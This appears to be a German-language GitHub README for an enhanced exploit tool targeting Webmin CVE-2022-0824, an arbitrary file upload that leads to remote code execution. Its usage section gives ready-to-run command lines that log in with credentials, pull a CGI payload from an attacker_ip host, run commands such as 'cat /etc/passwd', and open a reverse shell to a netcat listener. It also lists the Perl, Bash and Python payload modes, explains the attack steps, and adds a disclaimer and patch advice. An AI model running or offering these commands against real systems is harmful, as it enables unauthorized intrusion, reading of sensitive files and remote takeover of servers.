Webmin-CVE-2022-0824-Enhanced-Exploit
[!IMPORTANT]
Webmin CVE-2022-0824 verbessertes Exploit-Tool – Unterstützt zwei Modi: Befehlsausführung und Reverse Shell

[!IMPORTANT]
Ein verbessertes Exploit-Tool für die Schwachstelle Webmin CVE-2022-0824, das direkte Befehlsausführung und Reverse Shell unterstützt.
🚀 Funktionen
- ✅ Zwei-Modus-Unterstützung: Befehlsausführungsmodus + Reverse-Shell-Modus
- ✅ Verschiedene Payloads: Perl, Bash, Python – drei verschiedene Payloads
- ✅ Intelligentes Dateimanagement: Automatische Generierung eindeutiger Dateinamen zur Vermeidung von Dateikonflikten
- ✅ Erzwungenes Überschreiben beim Hochladen: Automatische Behandlung von Überschreibungen vorhandener Dateien
- ✅ Mehrere Upload-Methoden: HTTP-Download, direkter Upload, Erstellung durch Befehlsausführung
- ✅ Detaillierte Debug-Informationen: Vollständiges Ausführungsprotokoll
- ✅ Benutzerfreundliche Oberfläche: Farbige Ausgabe und klare Statusmeldungen
- CVE-Nummer: CVE-2022-0824
- Betroffene Versionen: Webmin < 1.990
- Schwachstellentyp: Remote Code Execution durch beliebigen Dateiupload
- CVSS-Bewertung: 9.8 (Critical)
🛠️ Installationsanforderungen
# Python 3.6+
pip3 install requests urllib3
📖 Verwendung
Befehlsausführungsmodus (empfohlen)
# Grundlegende Befehlsausführung
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "whoami"
# Systeminformationen anzeigen
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "uname -a"
# Dateien auflisten
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "ls -la /etc"
# Sensible Dateien anzeigen
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "cat /etc/passwd"
# Netzwerkinformationen
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "netstat -tulnp"
Reverse-Shell-Modus
# 1. Listener starten
nc -nlvp 9999
# 2. Exploit ausführen
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 -L attacker_ip -P 9999
📝 Parameterbeschreibung
*Hinweis: Im Reverse-Shell-Modus erforderlich
🎯 Anwendungsbeispiele
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "whoami && id && pwd"
Beispiel 2: Dateisystem erkunden
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "find /home -name '*.txt' 2>/dev/null"
Beispiel 3: Netzwerkkonfiguration anzeigen
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "ip addr show && route -n"
🔧 Funktionsweise
- Anmeldeüberprüfung: Anmeldung an der Webmin-Verwaltungsoberfläche mit den bereitgestellten Anmeldedaten
- Payload-Generierung: Erstellung entsprechender CGI-Skripte je nach Modus
- Datei-Upload: Hochladen des Payloads über die HTTP-Download-Funktion des Dateimanagers
- Berechtigungseinstellung: Festlegen der Ausführungsberechtigungen für die hochgeladene Datei
- Befehlsausführung: Aufruf des hochgeladenen CGI-Skripts zur Ausführung von Befehlen oder Aufbau einer Reverse-Verbindung
🛡️ Schutzempfehlungen
- Aktualisieren Sie Webmin umgehend auf die neueste Version (>= 1.990)
- Beschränken Sie den Netzwerkzugriff auf die Webmin-Verwaltungsoberfläche
- Verwenden Sie starke Passwörter und Zwei-Faktor-Authentifizierung
- Führen Sie regelmäßige Audits der Systemprotokolle durch
- Setzen Sie eine Web Application Firewall (WAF) ein
⚠️ Haftungsausschluss
Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt.
- 🚫 Nicht für nicht autorisierte Systeme verwenden
- 🚫 Nicht für böswillige Angriffe verwenden
- 🚫 Der Benutzer trägt die entsprechende rechtliche Verantwortung
- ✅ Nur in Umgebungen mit ausdrücklicher Genehmigung verwenden
- ✅ Für Sicherheitsforschung und Schwachstellenvalidierung
📚 Technische Details
Payload-Typen
- Perl CGI: Primärer Payload, beste Kompatibilität
- Bash CGI: Alternativer Payload, geeignet für Linux-Systeme
- Python CGI: Alternativer Payload, umfangreichste Funktionen
Upload-Methoden
- HTTP-Download: Über die Remote-Download-Funktion des Webmin-Dateimanagers
- Direkter Upload: Über die Datei-Upload-Schnittstelle
- Befehlsbereitstellung: Erstellung von Dateien über Systembefehle
Dateibenennungsstrategie
- MD5-Hash basierend auf Befehlsinhalt
- Zeitstempel-Suffix
- Stellt sicher, dass bei jeder Ausführung ein anderer Dateiname verwendet wird
🔄 Änderungsprotokoll
v5.0 (2025-08-05)
- ✨ Neuer Befehlsausführungsmodus
- 🐛 Problem mit Dateiüberschreibung behoben
- 🔧 Dateibenennungsstrategie verbessert
- 📈 Fehlerbehandlung verbessert
v4.0 (Basierend auf Original)
- 🎯 Basierend auf dem ursprünglichen Code von faisalfs10x
- 🔧 CGI-Kompatibilität verbessert
- 📝 Detaillierte Protokollierung hinzugefügt
🤝 Beitragen
Willkommen bei der Einreichung von Issues und Pull Requests!
- Forken Sie dieses Repository
- Erstellen Sie einen Feature-Branch (
git checkout -b feature/AmazingFeature)
- Committen Sie die Änderungen (
git commit -m 'Add some AmazingFeature')
- Pushen Sie den Branch (
git push origin feature/AmazingFeature)
- Öffnen Sie einen Pull Request
📄 Lizenz
Dieses Projekt ist unter der MIT-Lizenz lizenziert – weitere Details finden Sie in der LICENSE-Datei.
🙏 Danksagungen
📞 Kontakt
Bei Fragen oder Anregungen kontaktieren Sie uns bitte über:
- 📧 Einreichen eines GitHub Issue
- 🐛 Melden Sie Sicherheitsprobleme per privater Nachricht
⭐ Wenn dieses Projekt Ihnen hilft, geben Sie bitte einen Star zur Unterstützung!
🔗 Verwandte Links
requirements.txt
requests>=2.25.1
urllib3>=1.26.0